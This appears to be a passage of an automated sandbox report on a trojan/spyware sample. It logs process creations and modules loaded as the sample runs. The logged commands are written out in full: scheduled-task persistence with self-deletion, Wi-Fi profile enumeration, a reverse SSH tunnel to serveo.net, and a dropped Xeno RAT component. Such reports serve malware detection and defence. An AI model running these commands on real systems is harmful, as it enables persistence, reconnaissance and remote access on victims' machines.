Source: C:\Users\user\AppData\Roaming\manager.exe Code function: 41_2_023B0B88 41_2_023B0B88
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Code function: 42_2_03223768 42_2_03223768
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Code function: 42_2_03224350 42_2_03224350
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Code function: 42_2_03224B80 42_2_03224B80
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Code function: 42_2_03220B88 42_2_03220B88
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Code function: 42_2_03222138 42_2_03222138
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Code function: 42_2_03220B78 42_2_03220B78
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Code function: 42_2_03223759 42_2_03223759
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Code function: 45_2_00ED0B88 45_2_00ED0B88
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 46_2_00007FF848F32E1C 46_2_00007FF848F32E1C
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 46_2_00007FF848F331C7 46_2_00007FF848F331C7
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 47_2_00007FF848F12E1C 47_2_00007FF848F12E1C
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 47_2_00007FF848F131C7 47_2_00007FF848F131C7
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 48_2_00007FF848F12E1C 48_2_00007FF848F12E1C
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 48_2_00007FF848F131C7 48_2_00007FF848F131C7
One or more processes crash
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5500 -s 3644
Sample file is different than original file name gathered from version info
Source: 0LpFv1haTA.exe, 00000000.00000000.2093729342.0000019457B52000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameI4021fb56e8cb7cb0489bdc10979dda.exep( vs 0LpFv1haTA.exe
Source: 0LpFv1haTA.exe Binary or memory string: OriginalFilenameI4021fb56e8cb7cb0489bdc10979dda.exep( vs 0LpFv1haTA.exe
Source: 0LpFv1haTA.exe.0.dr Binary or memory string: OriginalFilenameI4021fb56e8cb7cb0489bdc10979dda.exep( vs 0LpFv1haTA.exe
Source: manager.exe.7.dr, Encryption.cs Cryptographic APIs: 'CreateDecryptor'
Source: manager.exe.41.dr, Encryption.cs Cryptographic APIs: 'CreateDecryptor'
Source: manager.exe.7.dr, Handler.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0LpFv1haTA.exe.0.dr, ub.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0LpFv1haTA.exe.0.dr, ub.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: manager.exe.41.dr, Handler.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0LpFv1haTA.exe, ub.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0LpFv1haTA.exe, ub.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@68/17@3/11
Source: C:\Users\user\Desktop\0LpFv1haTA.exe File created: C:\Users\user\AppData\Local\Starlabs Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3996:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5384:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_03
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Mutant created: \Sessions\1\BaseNamedObjects\m1ddre3jjw
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1680:120:WilError_03
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Mutant created: \Sessions\1\BaseNamedObjects\Xeno_rat_nd8912d-admin
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5500
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe File created: C:\Users\user\AppData\Local\Temp\K-Journals Jump to behavior
Source: 0LpFv1haTA.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0LpFv1haTA.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\0LpFv1haTA.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449DCA000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449DB8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E44A2B6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 0LpFv1haTA.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\Desktop\0LpFv1haTA.exe File read: C:\Users\user\Desktop\0LpFv1haTA.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\0LpFv1haTA.exe "C:\Users\user\Desktop\0LpFv1haTA.exe"
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 3
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: unknown Process created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net
Source: C:\Windows\System32\OpenSSH\ssh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net
Source: C:\Windows\System32\OpenSSH\ssh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5500 -s 3644
Source: unknown Process created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Users\user\AppData\Roaming\manager.exe "C:\Users\user\AppData\Roaming\manager.exe"
Source: C:\Users\user\AppData\Roaming\manager.exe Process created: C:\Users\user\AppData\Roaming\XenoManager\manager.exe "C:\Users\user\AppData\Roaming\XenoManager\manager.exe"
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\XenoManager\manager.exe C:\Users\user\AppData\Roaming\XenoManager\manager.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 3 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]" Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal" Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal" Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Users\user\AppData\Roaming\manager.exe "C:\Users\user\AppData\Roaming\manager.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Roaming\manager.exe Process created: C:\Users\user\AppData\Roaming\XenoManager\manager.exe "C:\Users\user\AppData\Roaming\XenoManager\manager.exe"
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /Create /TN "mswindow" /XML "C:\Users\user\AppData\Local\Temp\tmp4A67.tmp" /F
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\timeout.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: httpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
